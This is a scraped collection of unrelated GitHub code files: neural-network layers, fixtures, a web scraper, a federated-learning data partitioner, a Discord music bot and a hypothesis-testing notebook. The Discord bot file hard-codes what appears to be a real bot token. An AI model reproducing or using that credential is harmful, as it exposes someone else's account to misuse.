out_channel\n Z = np.einsum(\"biwk,oik->bow\", A_stride, self.W)\n Z = Z + self.b[np.newaxis, :, np.newaxis]\n\n # print(\"-->\", A.shape, self.W.shape, \"=>\", Z.shape)\n\n return Z\n\n def backward(self, dLdZ):\n \"\"\"\n Argument:\n dLdZ (np.array): (batch_size, out_channels, output_size)\n Return:\n dLdA (np.array): (batch_size, in_channels, input_size)\n \"\"\"\n dLdZ_stride = np.pad(dLdZ, [(0,), (0,), (self.kernel_size - 1,)], \"constant\", constant_values=0)\n\n # Calculating dLdZ\n # dLdZ_stride (np.array): (batch_size, out_channels, window_count, kernel_size)\n # kernel (np.array): (out_channel, in_channel, kernel_size)\n dLdZ_stride = sliding_window_view(dLdZ_stride, (self.kernel_size,), (2,))\n kernel = np.flip(self.W, axis=2)\n dLdA = np.einsum(\"bowk,oik->biw\", dLdZ_stride, kernel)\n\n # Calculating dLdW\n A_stride = sliding_window_view(self.A, (dLdZ.shape[2],), (2,))\n self.dLdW = np.einsum(\"biks,bos->oik\", A_stride, dLdZ)\n\n # Calculating dLdb\n self.dLdb = np.einsum(\"bos->o\", dLdZ)\n\n return dLdA\n\n\nclass Conv1d:\n def __init__(self, in_channels, out_channels, kernel_size, stride,\n weight_init_fn=None, bias_init_fn=None):\n # Do not modify the variable names\n\n self.stride = stride\n\n # Initialize Conv1d() and Downsample1d() isntance\n self.conv1d_stride1 = Conv1d_stride1(\n in_channels, out_channels, kernel_size,\n weight_init_fn=weight_init_fn, bias_init_fn=bias_init_fn\n )\n self.downsample1d = Downsample1d(stride)\n\n def forward(self, A):\n \"\"\"\n Argument:\n A (np.array): (batch_size, in_channels, input_size)\n Return:\n Z (np.array): (batch_size, out_channels, output_size)\n \"\"\"\n\n # Call Conv1d_stride1\n C = self.conv1d_stride1.forward(A)\n\n # downsample\n Z = self.downsample1d.forward(C)\n\n return Z\n\n def backward(self, dLdZ):\n \"\"\"\n Argument:\n dLdZ (np.array): (batch_size, out_channels, output_size)\n Return:\n dLdA (np.array): (batch_size, in_channels, input_size)\n \"\"\"\n # Call downsample1d backward\n dLdC = self.downsample1d.backward(dLdZ)\n\n # Call Conv1d_stride1 backward\n dLdA = self.conv1d_stride1.backward(dLdC)\n\n return dLdA\n\n\nif __name__ == \"__main__\":\n # Test your code here\n weight = np.array([\n [[1, 2], [2, 1]],\n [[0, 1], [1, 0]],\n [[3, 2], [1, 0]]\n ])\n A = np.array([\n [[1, 0, 1, 0, 1],\n [0, 1, 0, 1, 0]],\n ])\n T = Conv1d(2, 3, 2, 2, \n weight_init_fn=lambda *args: weight,)\n T.forward(A)\n dLdZ = np.array([[[1, 1], [2, 1], [1, 2]]])\n dLdA = T.backward(dLdZ)\n print(T.conv1d_stride1.dLdW)\n print(dLdA[0, 0, 1])\n ","repo_name":"MarkChenYutian/FPGATorch","sub_path":"src/Conv1d.py","file_name":"Conv1d.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"32924483411","text":"from pytest import fixture # type: ignore\n\nfrom roshi.factory import create_app\n\n\n__all__ = [\n 'app',\n 'config',\n]\n\n\n@fixture\ndef app():\n \"\"\"Roshi create application fixture.\"\"\"\n _app = create_app()\n\n with _app.app_context():\n yield _app\n\n\n@fixture\ndef config(app):\n # pylint: disable=redefined-outer-name\n \"\"\"The application config.\"\"\"\n return app.config\n","repo_name":"defrank/roshi","sub_path":"app/tests/fixtures/_app.py","file_name":"_app.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8284957787","text":"# Import main classes and functions from modules\nfrom .core import (\n GPRModel\n)\n\nfrom .kernels import (\n KernelWrapper\n)\n\n\n# from .likelihoods import (\n# LikelihoodWrapper\n# )\n\n# Import subpackages\n\n__all__ = [\n \"GPRModel\", \"KernelWrapper\"\n]\n\n# Package metadata\n__version__ = \"0.1.0\" # Update the version number as necessary\n","repo_name":"jimmyrisk/EasyGPR","sub_path":"easygpr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"728228564","text":"from sub_commands.sub_command_base import SubCommandBase\n\n\nclass SkillSubCommand(SubCommandBase):\n skill_order_info_list = None\n\n def add_argument(self, subparser):\n subparser.add_argument('-s', '--skill', action='store_true',\n help='include to see skill master order in the output')\n\n def retrieve(self):\n self.fetch_and_set_soup(f\"https://na.op.gg/champion/{self.get_champ_name_no_space()}/statistics/{self.champ_lane}/skill?\")\n\n def parse(self):\n self.skill_order_info_list = self.soup.find(\"div\", class_=\"tabItem Content championLayout-skill\") \\\n .find('div', class_='champion-box-content') \\\n .find_all('li', class_='champion-stats__filter__item')\n self.skill_order_info_list = [info for info in self.skill_order_info_list if info['data-index'] != 'All']\n\n def print(self):\n print(\"Skill Orders:\")\n print(\"{:>7} {:>15} {:>12} {:>12}\".format(\"index\", \"skill order\", \"win rate\", \"pick rate\"))\n for i, skill_order_info in enumerate(self.skill_order_info_list):\n skill_order = ' -> '.join(\n [s.find('span').text for s in skill_order_info.find_all('li', class_='champion-stats__list__item')])\n # somehow class names are reversed for pick_rate and win_rate on op.gg\n win_rate = skill_order_info \\\n .find('div', class_='champion-stats__filter_item_value--pickrate') \\\n .find('b').text\n pick_rate = skill_order_info \\\n .find('div', class_='champion-stats__filter_item_value--winrate') \\\n .find('b').text\n print(\"{:>7} {:>15} {:>12} {:>12}\".format(i+1, skill_order, win_rate, pick_rate))\n","repo_name":"hurjun1995/LeagueKipedia","sub_path":"sub_commands/skill_sub_command.py","file_name":"skill_sub_command.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"73476009270","text":"\n\nimport tensorflow as tf\nimport input_data\nimport matplotlib\n\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n\nx=tf.placeholder(tf.float32,[None,28,28,1])\nt=tf.placeholder(tf.float32,[None,10])\n\nx=tf.reshape(x,[-1,784])\n\n\nw =tf.Variable(tf.zeros(784,10))\nb = tf.Variable(tf.zeros(10))\n\ninit_op=tf.global_variables_initializer()\n\ny=tf.nn.softmax(tf.matmul(x,w)+b)\n\ncross_entropy=-tf.reduce_sum(t*tf.log(y))\n\nis_correct=tf.equal(tf.argmax(y,1),tf.argmax(t,1))\naccuracy=tf.reduce_sum(tf.cast(is_correct,tf.float32))\n\noptimizer=tf.train.GradientDescentOptimizer(learning_rate=0.03)\ntrain_step=optimizer.minimize(cross_entropy)\n\nwith tf.Session() as sess:\n sess.run(init_op)\n\n\nwith tf.Session() as sess:\n for step in range(1000):\n batch_xs,batch_ys=mnist.train.next_batch(100)\n sess.run(train_step,feed_dict={x: batch_xs,t: batch_ys})\n\n if step%100==0:\n acc,loss=sess.run([accuracy,cross_entropy])\n feed_dict={x:batch_xs,t:batch_ys}\n acc, loss = sess.run([accuracy, cross_entropy])\n feed_dict = {x: mnist.test.images, t: mnist.test.labels}\n\n","repo_name":"huntershuai/tensorflow","sub_path":"demo_mnist.py","file_name":"demo_mnist.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23846734084","text":"import pandas as pd\r\nimport xml.etree.ElementTree as ET\r\nimport xml.dom.minidom as minidom\r\nimport openpyxl\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom datetime import datetime\r\n\r\n# Открываем файл Excel\r\nworkbook = openpyxl.load_workbook('test_input.xlsx')\r\n\r\n# Выбираем активный лист\r\nsheet = workbook.active\r\n\r\n# Чтение значения из ячейки и вычисление результата\r\nvalue = sheet['B3'].value\r\nresult = sheet['B2'].value\r\ndate = sheet['B1'].value\r\n\r\n# Соединяем значения вместе\r\nresult_formula = f\"SABR0000001{date.strftime('%d%m%Y')}{result}\"\r\n# Чтение данных из файла Excel\r\ndf = pd.read_excel('test_input.xlsx', skiprows=4)\r\n\r\n# Создание корневого элемента\r\ncertdata = ET.Element('CERTDATA')\r\n\r\n# Добавление элемента FILENAME\r\nfilename = ET.SubElement(certdata, 'FILENAME')\r\nfilename.text = result_formula\r\n\r\n# Создание элемента ENVELOPE\r\nenvelope = ET.SubElement(certdata, 'ENVELOPE')\r\n\r\n# Создание элемента ECERT для каждой строки данных\r\nfor _, row in df.iterrows():\r\n ecert = ET.SubElement(envelope, 'ECERT')\r\n ET.SubElement(ecert, 'CERTNO').text = str(row['Ref no'])\r\n ET.SubElement(ecert, 'CERTDATE').text = str(row['Issuance Date']).split()[0]\r\n ET.SubElement(ecert, 'STATUS').text = str(row['Status'])\r\n ET.SubElement(ecert, 'IEC').text = str(row['IE Code'])\r\n ET.SubElement(ecert, 'EXPNAME').text = str(row['Client'])\r\n ET.SubElement(ecert, 'BILLID').text = str(row['Bill Ref no'])\r\n ET.SubElement(ecert, 'SDATE').text = str(row['SB Date']).split()[0]\r\n ET.SubElement(ecert, 'SCC').text = str(row['SB Currency'])\r\n ET.SubElement(ecert, 'SVALUE').text = str(row['SB Amount'])\r\n\r\n # Получение курса доллара США с сайта ЦБ РФ\r\n sb_date = datetime.strftime(row['SB Date'], \"%d.%m.%Y\")\r\n response = requests.get(f\"https://www.cbr.ru/currency_base/daily/?UniDbQuery.Posted=True&UniDbQuery.To={sb_date}\")\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n rate_usd = soup.find('td', text='Доллар США').find_next_sibling('td').text.replace(',', '.')\r\n\r\n # Вычисление значения атрибута SVALUEUSD\r\n svalue_rub = float(row['SB Amount'])\r\n svalue_usd = round(svalue_rub / float(rate_usd), 2)\r\n\r\n # Добавление атрибута SVALUEUSD\r\n svalue_usd_elem = ET.SubElement(ecert, 'SVALUEUSD')\r\n svalue_usd_elem.text = str(svalue_usd)\r\n\r\n# Создание и сохранение XML-файла\r\nxml_str = minidom.parseString(ET.tostring(certdata)).toprettyxml(indent=\"\\t\", encoding='UTF-8')\r\n\r\n# Запись в файл\r\nwith open(\"output_xml2.xml\", \"w\", encoding='UTF-8') as f:\r\n f.write(xml_str.decode())\r\n","repo_name":"SysoevAS/Python-test-task","sub_path":"Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"13542987755","text":"class Student:\n def __init__(self, fname):\n self.fname = fname\n self.tags = ['ID', 'LAST NAME', 'FIRST NAME', 'CLASS', 'GPA']\n\n def openfile(self):\n with open(self.fname, 'r') as self.f:\n self.content = self.f.readlines()\n \n def format(self):\n for val in self.content:\n newlst = val.split(',')\n for index in range(5):\n print(self.tags[index], ':', newlst[index])\n\n\n\nbag1 = Student('/Users/puhal/Documents/Python/DSA/Chapter1/StudentsDB.txt')\n\nbag1.openfile()\nbag1.format()","repo_name":"Puhalenthi/-MyPythonBasics","sub_path":"Python/DSA/Chapter1/StudentFileReader.py","file_name":"StudentFileReader.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"9165034277","text":"from torchvision import datasets, transforms\r\nfrom fedlab.utils.dataset.partition import CIFAR10Partitioner\r\nfrom fedlab.utils.functional import partition_report #save_dict\r\nimport numpy as np\r\n#in-place 操作可能会覆盖计算梯度所需的值。\r\n\r\n#每个 in-place 操作实际上都需要重写计算图的实现。out-of-place只是分配新对象并保留对旧计算图的引用,\r\n# 而 in-place 操作则需要将所有输入的创建更改为代表此操作的函数。\r\n\r\n#输出高度 = (输入高度 + 2 * 填充 - 卷积核高度)/ 步幅 + 1\r\n#输出宽度 = (输入宽度 + 2 * 填充 - 卷积核宽度)/ 步幅 + 1\r\n#默认的步幅(stride=1)和填充(padding=0)\r\n#池化层\r\n#输出特征图高度 = (输入特征图高度 - 池化窗口高度)/ 步幅 + 1\r\n#输出特征图宽度 = (输入特征图宽度 - 池化窗口宽度)/ 步幅 + 1\r\n\r\n\r\nclass Dataset(object):\r\n '''\r\n #cifar10训练集每个data_batch,10000,其中十个类别是随机独立同分布,\r\n #DATA.sampler.SubsetRandomSampler用于从给定列表按照列表元素对应样本索引在数据集中抽取样本并\r\n # 进行打乱,比如抽取样本索引为[25,86,34,75],返回给loader可能会变为[34,86,25,75]\r\n #因此不需要shuffle进行打乱,因为已经打乱了\r\n '''\r\n def __init__(self, conf, dir_alpha = 0.3) -> None:\r\n self.conf = conf\r\n self.train_dataset, self.eval_dataset = self.get_dataset(self.conf['data_dir'], self.conf['type'])\r\n self.dataset_indice_list = self.get_indice(dir_alpha)\r\n \r\n def get_dataset(self, dir, name):\r\n\r\n if name=='mnist':\r\n transform_train = transforms.Compose([ transforms.ToTensor(), \r\n transforms.Normalize((0.5,), (0.5,)) \r\n ]) \r\n train_dataset = datasets.MNIST(dir, train=True, download=True, transform=transform_train())\r\n eval_dataset = datasets.MNIST(dir, train=False, transform=transforms.ToTensor())\r\n\r\n\r\n\r\n elif name=='cifar10':\r\n if True:\r\n transform_train = transforms.Compose([\r\n # transforms.RandomResizedCrop(32, scale=(0.8, 1.0)),\r\n # transforms.Resize((224, 224)),\r\n transforms.RandomCrop(32, padding=4),\r\n transforms.RandomHorizontalFlip(),\r\n # transforms.RandomRotation((-45,45)), #随机旋转\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\r\n ])\r\n # transform_train = transforms.Compose([transforms.Resize((224, 224)),\r\n # transforms.RandomHorizontalFlip(p=0.5),\r\n # transforms.ToTensor(),\r\n # transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),])\r\n \r\n transform_test = transforms.Compose([transforms.ToTensor(),transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),])\r\n train_dataset = datasets.CIFAR10(dir, train=True, download=True,transform=transform_train)\r\n eval_dataset = datasets.CIFAR10(dir, train=False, transform=transform_test)\r\n else :\r\n pass\r\n return train_dataset, eval_dataset\r\n \r\n def get_indice(self, dir_alpha):\r\n num_clients = self.conf['config_train'].UAV_NUM\r\n num_samples = len(self.train_dataset)\r\n print(num_samples)\r\n \r\n client_sample_nums = [np.random.randint(800,1000) for i in range(num_clients)]\r\n \r\n\r\n ####absolutely balance and iid\r\n # client_sample_nums = [np.array(10000) for i in range(num_clients)]\r\n # dataset_indice_list = []\r\n # all_range = list(range(len(self.train_dataset)))\r\n # data_len = int(len(self.train_dataset) / num_clients)\r\n # for i in range(num_clients):\r\n # dataset_indice = all_range[i * data_len: (i + 1) * data_len]\r\n # dataset_indice_list.append(dataset_indice)\r\n\r\n\r\n #######generate data distribution by fedlab------------------\r\n num_classes = 10\r\n seed = 2023\r\n #####Hetero Dirichlet\r\n # cifar10part = CIFAR10Partitioner(self.train_dataset.targets,\r\n # num_clients,\r\n # balance=None,\r\n # partition=\"dirichlet\",\r\n # dir_alpha=0.3,\r\n # seed=seed)\r\n ####基于shards的划分\r\n # num_shards = 200\r\n # cifar10part = CIFAR10Partitioner(self.train_dataset.targets,\r\n # num_clients,\r\n # balance=None,\r\n # partition=\"shards\",\r\n # num_shards=num_shards,\r\n # seed=seed) \r\n \r\n ###均衡IID\r\n # cifar10part = CIFAR10Partitioner(self.train_dataset.targets,\r\n # num_clients,\r\n # balance=True,\r\n # partition=\"iid\",\r\n # seed=seed)\r\n ###非均衡IID划分\r\n # cifar10part = CIFAR10Partitioner(self.train_dataset.targets,\r\n # num_clients,\r\n # balance=False,\r\n # partition=\"iid\",\r\n # unbalance_sgm=0.3,\r\n # seed=seed)\r\n \r\n ####均衡dirichlet划分\r\n # print(self.train_dataset.targets[:100])\r\n # cifar10part = CIFAR10Partitioner(self.train_dataset.targets,\r\n # num_clients,\r\n # balance=True,\r\n # partition=\"dirichlet\",\r\n # dir_alpha=0.3,\r\n # verbose=False,\r\n # seed=seed)\r\n # print(self.train_dataset.targets[:100])\r\n ###非均衡dirichlet划分\r\n # cifar10part = CIFAR10Partitioner(self.train_dataset.targets,\r\n # num_clients,\r\n # balance=False,\r\n # partition=\"dirichlet\",\r\n # unbalance_sgm=0.3,\r\n # dir_alpha=0.3,\r\n # seed=seed)\r\n\r\n #####\r\n ######\r\n # dataset_indice_list = []\r\n # for i in range(num_clients):\r\n # dataset_indice = cifar10part.client_dict[i]\r\n # dataset_indice_list.append(dataset_indice)\r\n #######------------------------generate data distribution by myself\r\n print(client_sample_nums)\r\n client_dic = self.client_inner_dirichlet_partition_v2(self.train_dataset.targets, num_clients=num_clients,num_classes=num_classes,\r\n dir_alpha=dir_alpha, client_sample_nums=client_sample_nums, seed=seed)\r\n \r\n # client_dic = self.iid(num_samples=num_samples, client_sample_nums=client_sample_nums)\r\n dataset_indice_list = [client_dic[i] for i in range(num_clients)]\r\n ######---------------------------\r\n for i in range(len(dataset_indice_list)):\r\n for j in range(i+1, len(dataset_indice_list)):\r\n set_c = set(dataset_indice_list[i]) & set(dataset_indice_list[j])\r\n # assert not set_c , \"存在相同元素\"\r\n assert len(set_c) == 0, \"存在同一元素\"\r\n\r\n return dataset_indice_list\r\n\r\n\r\n\r\n def client_inner_dirichlet_partition(self, targets, num_clients, num_classes, dir_alpha,\r\n client_sample_nums, verbose=False, seed=2023):\r\n # np.random.seed(seed)\r\n if not isinstance(targets, np.ndarray):\r\n targets = np.array(targets)\r\n if not isinstance(client_sample_nums, np.ndarray):\r\n client_sample_nums = np.array(client_sample_nums)\r\n ####\r\n client_priors = np.random.dirichlet(alpha=[dir_alpha] * num_clients,\r\n size=num_classes)\r\n prior_cumsum = np.cumsum(client_priors, axis=1)\r\n idx_list = [np.where(targets == i)[0] for i in range(num_classes)]\r\n\r\n class_amount = [len(idx_list[i]) for i in range(num_classes)]\r\n client_indices = [np.zeros(client_sample_nums[cid]).astype(np.int64) for cid in\r\n range(num_clients)]\r\n print('总样本数:', np.sum(client_sample_nums))\r\n i = 0\r\n j = 0\r\n while np.sum(client_sample_nums) != 0:\r\n curr_class = np.random.randint(num_classes)\r\n i +=1\r\n if verbose:\r\n print('Remaining Data: %d' % np.sum(client_sample_nums))\r\n # Redraw class label if no rest in current cline samples\r\n if class_amount[curr_class] <= 0:\r\n continue\r\n class_amount[curr_class] -= 1\r\n curr_prior = prior_cumsum[curr_class]\r\n while True:\r\n curr_cid = np.argmax(np.random.uniform() <= curr_prior)\r\n # If current node is full resample a client\r\n \r\n if client_sample_nums[curr_cid] <= 0:\r\n continue\r\n j +=1\r\n client_sample_nums[curr_cid] -= 1\r\n client_indices[curr_cid][client_sample_nums[curr_cid]] = \\\r\n idx_list[curr_class][class_amount[curr_class]]\r\n\r\n break\r\n print('循环取样个数,大于等于总样本数', i)\r\n print('赋值个数,应该等于总样本数' , j)\r\n client_dict = {cid: client_indices[cid] for cid in range(num_clients)}\r\n return client_dict\r\n \r\n #######solution2, not suitable for sampling few data\r\n # class_priors = np.random.dirichlet(alpha=[dir_alpha] * num_classes,\r\n # size=num_clients)\r\n # while np.sum(client_sample_nums) != 0:\r\n # curr_cid = np.random.randint(num_clients)\r\n \r\n # if verbose:\r\n # print('Remaining Data: %d' % np.sum(client_sample_nums))\r\n # # If current node is full resample a client\r\n # if client_sample_nums[curr_cid] <= 0:\r\n # continue\r\n # client_sample_nums[curr_cid] -= 1\r\n # curr_prior = prior_cumsum[curr_cid]\r\n # while True:\r\n # curr_class = np.argmax(np.random.uniform() <= curr_prior)\r\n # # Redraw class label if no rest in current class samples\r\n # if class_amount[curr_class] <= 0:\r\n # continue\r\n # class_amount[curr_class] -= 1\r\n # client_indices[curr_cid][client_sample_nums[curr_cid]] = \\\r\n # idx_list[curr_class][class_amount[curr_class]]\r\n\r\n # break\r\n \r\n def client_inner_dirichlet_partition_v2(self, targets, num_clients, num_classes, dir_alpha,\r\n client_sample_nums, verbose=False, seed=2023):\r\n '''old version '''\r\n # np.random.seed(seed)\r\n if not isinstance(targets, np.ndarray):\r\n targets = np.array(targets)\r\n\r\n # rand_perm = np.random.permutation(targets.shape[0])\r\n # targets = targets[rand_perm]\r\n\r\n class_priors = np.random.dirichlet(alpha=[dir_alpha] * num_classes,\r\n size=num_clients)\r\n prior_cumsum = np.cumsum(class_priors, axis=1)\r\n idx_list = [np.where(targets == i)[0] for i in range(num_classes)]\r\n class_amount = [len(idx_list[i]) for i in range(num_classes)]\r\n\r\n client_indices = [np.zeros(client_sample_nums[cid]).astype(np.int64) for cid in\r\n range(num_clients)]\r\n print('总样本数:', np.sum(client_sample_nums))\r\n i = 0\r\n j = 0\r\n while np.sum(client_sample_nums) != 0:\r\n i+=1\r\n curr_cid = np.random.randint(num_clients)\r\n # If current node is full resample a client\r\n if verbose:\r\n print('Remaining Data: %d' % np.sum(client_sample_nums))\r\n if client_sample_nums[curr_cid] <= 0:\r\n continue\r\n client_sample_nums[curr_cid] -= 1\r\n curr_prior = prior_cumsum[curr_cid]\r\n while True:\r\n curr_class = np.argmax(np.random.uniform() <= curr_prior)\r\n # Redraw class label if no rest in current class samples\r\n if class_amount[curr_class] <= 0:\r\n continue\r\n class_amount[curr_class] -= 1\r\n j+=1\r\n client_indices[curr_cid][client_sample_nums[curr_cid]] = \\\r\n idx_list[curr_class][class_amount[curr_class]]\r\n\r\n break\r\n print('循环取样个数,大于等于总样本数', i)\r\n print('赋值个数,应该等于总样本数' , j)\r\n client_dict = {cid: client_indices[cid] for cid in range(num_clients)}\r\n return client_dict\r\n\r\n def iid(self, num_samples, client_sample_nums):\r\n rand_perm = np.random.permutation(num_samples)\r\n num_cumsum = np.cumsum(client_sample_nums).astype(int)\r\n client_dict = self.split_indices(num_cumsum, rand_perm)\r\n return client_dict\r\n \r\n def split_indices(self, num_cumsum, rand_perm):\r\n client_indices_pairs = [(cid, idxs) for cid, idxs in\r\n enumerate(np.split(rand_perm, num_cumsum)[:-1])]\r\n client_dict = dict(client_indices_pairs)\r\n return client_dict\r\n\r\n\r\n","repo_name":"Boyhood-99/research2","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":14165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8977350207","text":"#!/usr/bin/env python\nfrom decida.FormulaCalculator import FormulaCalculator\n\nfc = FormulaCalculator(None,\n title=\"field mowing calculator\",\n par_specs = [\n [\"n\", \"number of turns\", \"\", 43, \"t\"],\n [\"dr\", \"swath\", \"ft\", 3, \"n\"],\n [\"s\", \"speed\", \"ft/s\", 3, \"n\"],\n [\"t\", \"total time\", \"min\", 100, \"n\"],\n ],\n recalc_specs = [\n [\"t\", \"t = n*(n+1)*(dr*pi)/(s*60.0)\"],\n [\"n\", \"n = sqrt(0.25 + (s*60.0*t)/(dr*pi)) - 0.5\"],\n ]\n)\n","repo_name":"preritt/decida","sub_path":"decida/test/test_FormulaCalculator_3.py","file_name":"test_FormulaCalculator_3.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11654720659","text":"import numpy as np\nimport pandas as pd\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n\nclass PartialDependence:\n def __init__(self, model, X: pd.DataFrame, feature: str) -> None:\n self.feature = feature\n self.model = model\n self.X = X.copy()\n self.result = self._get_result()\n\n @property\n def mean_prediction(self) -> float:\n # Get the mean prediction of the model on the input data\n return self.model.predict(self.X).mean()\n\n def fit(self, value) -> None:\n # Update input data with given value of the feature\n self.X[self.feature] = value\n\n def _prepare_values(self) -> np.ndarray:\n # Prepare a sequence of values to use for computing partial dependence\n if self.X[self.feature].dtype in (np.int64, int):\n min_, max_ = self.X[self.feature].min(), self.X[self.feature].max()\n return np.unique(np.linspace(min_, max_, 100, dtype=int))\n elif self.X[self.feature].dtype in (np.float64, float):\n min_, max_ = self.X[self.feature].min(), self.X[self.feature].max()\n return np.linspace(min_, max_, 100)\n return self.X[self.feature].unique()\n\n def _get_result(self) -> pd.DataFrame:\n # Compute the average prediction for each prepared value of the feature\n data = {self.feature: [], 'avg_risk_score': []}\n for value in self._prepare_values():\n self.fit(value)\n data[self.feature].append(value)\n data['avg_risk_score'].append(self.mean_prediction)\n return pd.DataFrame(data).sort_values(self.feature).reset_index(drop=True)\n\n def plot(self, is_categorical: bool = False, show: bool = False, **kwargs) -> go.Figure:\n # Generate a plot of the partial dependence results\n if not is_categorical:\n fig = px.line(x=self.result[self.feature], y=self.result['avg_risk_score'])\n fig.update_xaxes(title_text=self.feature)\n fig.update_yaxes(title_text='avg risk score')\n # Generate a bar plot of the partial dependence results for categorical feature\n else:\n fig = px.bar(y=self.result[self.feature], x=self.result['avg_risk_score'], orientation='h')\n fig.update_yaxes(title_text=self.feature)\n fig.update_xaxes(title_text='avg risk score')\n fig.update_layout(title_text=f'Partial Dependence', **kwargs)\n if show:\n fig.show()\n return fig\n","repo_name":"wiese-m/survival-studio","sub_path":"explanation/global_explanation/partial_dependence.py","file_name":"partial_dependence.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"44570588237","text":"import discord\n#from discord.ui import Button, View\nfrom discord.ext import commands\nfrom youtube_dl import YoutubeDL\n\nYDL_OPTIONS = {'format': 'worstaudio/best', 'noplaylist': 'False', 'simulate': 'True',\n 'preferredquality': '192', 'preferredcodec': 'mp3', 'key': 'FFmpegExtractAudio'}\n#FFMPEG_OPTIONS_LOCAL = {'before_options': '-f dshow', 'options': ''}\nFFMPEG_OPTIONS = {'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'}\n\nintents = discord.Intents.default()\nintents.message_content = True\nbot = commands.Bot(command_prefix='!', intents=intents)\n\n# проверка запуска бота + его статус\n@bot.event\nasync def on_ready():\n print('Bot connected')\n await bot.change_presence(status = discord.Status.online, activity = discord.Game('захват мира'))\n\n# команда (!ping) для проверки работы бота в дс\n@bot.command()\nasync def ping(ctx):\n await ctx.send('pong')\n\n# команда (!join) для присоединения бота к голосовому каналу\n@bot.command()\nasync def join(ctx, url):\n vc = await ctx.message.author.voice.channel.connect()\n\n with YoutubeDL(YDL_OPTIONS) as ydl:\n if 'https://' in url:\n info = ydl.extract_info(url, download=False)\n else:\n info = ydl.extract_info(f\"ytsearch:{url}\", download=False)['entries'][0]\n \n link = info['formats'][0]['url']\n \n vc.play(discord.FFmpegPCMAudio(executable=\"C:/FFmpeg/bin/ffmpeg.exe\", source=link, **FFMPEG_OPTIONS))\n\n #src = \"audio=CABLE Output (VB-Audio Virtual Cable)\"\n\n #vc.play(discord.FFmpegPCMAudio(executable = \"C:/FFmpeg/bin/ffmpeg.exe\", source=src, **FFMPEG_OPTIONS_LOCAL))\n\n# команда (!leave) для отсоединения бота от голосового канала\n@bot.command()\nasync def leave(ctx):\n await ctx.message.guild.voice_client.disconnect()\n\nbot.run('MTA3MzM0MjkyODE0NTEwMDkwMA.Gs5DA7.0D4g4JgJeFHe2kQZICH757LkCQfXgZcG_KPZNA')\n","repo_name":"sadness18/ds_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"36733692879","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # **Hypothesis Testing**\n# \n\n# The goal of hypothesis testing is to answer the question, “Given a sample and an apparent effect, what is the probability of seeing such an effect by chance?” The first step is to quantify the size of the apparent effect by choosing a test statistic (t-test, ANOVA, etc). The next step is to define a null hypothesis, which is a model of the system based on the assumption that the apparent effect is not real. Then compute the p-value, which is the probability of the null hypothesis being true, and finally interpret the result of the p-value, if the value is low, the effect is said to be statistically significant, which means that the null hypothesis may not be accurate.\n# \n\n# ## Objectives\n# \n\n# * Import Libraries\n# * Lab exercises\n# * Stating the hypothesis\n# * Levene's Test for equality\n# * Preparing your data for hypothesis testing\n# * Quiz\n# \n\n# ## Import Libraries\n# \n\n# All Libraries required for this lab are listed below. The libraries pre-installed on Skills Network Labs are commented. If you run this notebook in a different environment, e.g. your desktop, you may need to uncomment and install certain libraries.\n# \n\n# In[ ]:\n\n\n#install specific version of libraries used in lab\n#! mamba install pandas==1.3.3\n#! mamba install numpy=1.21.2\n#! mamba install scipy=1.7.1-y\n#! mamba install seaborn=0.9.0-y\n#! mamba install matplotlib=3.4.3-y\n#! mamba install statsmodels=0.12.0-y\n\n\n# Import the libraries we need for the lab\n# \n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport scipy.stats\n\n\n# Read in the csv file from the URL using the request library\n# \n\n# In[2]:\n\n\nratings_url = 'https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-ST0151EN-SkillsNetwork/labs/teachingratings.csv'\ndf = pd.read_csv(ratings_url)\n\n\n# ### T-Test: Using the teachers' rating data set, does gender affect teaching evaluation rates?\n# \n\n# We will be using the t-test for independent samples. For the independent t-test, the following assumptions must be met.\n# \n# * One independent, categorical variable with two levels or group\n# * One dependent continuous variable\n# * Independence of the observations. Each subject should belong to only one group. There is no relationship between the observations in each group.\n# * The dependent variable must follow a normal distribution\n# * Assumption of homogeneity of variance\n# \n\n# State the hypothesis\n# \n# * $H\\_0: µ\\_1 = µ\\_2$ (\"there is no difference in evaluation scores between male and females\")\n# * $H\\_1: µ\\_1 ≠ µ\\_2$ 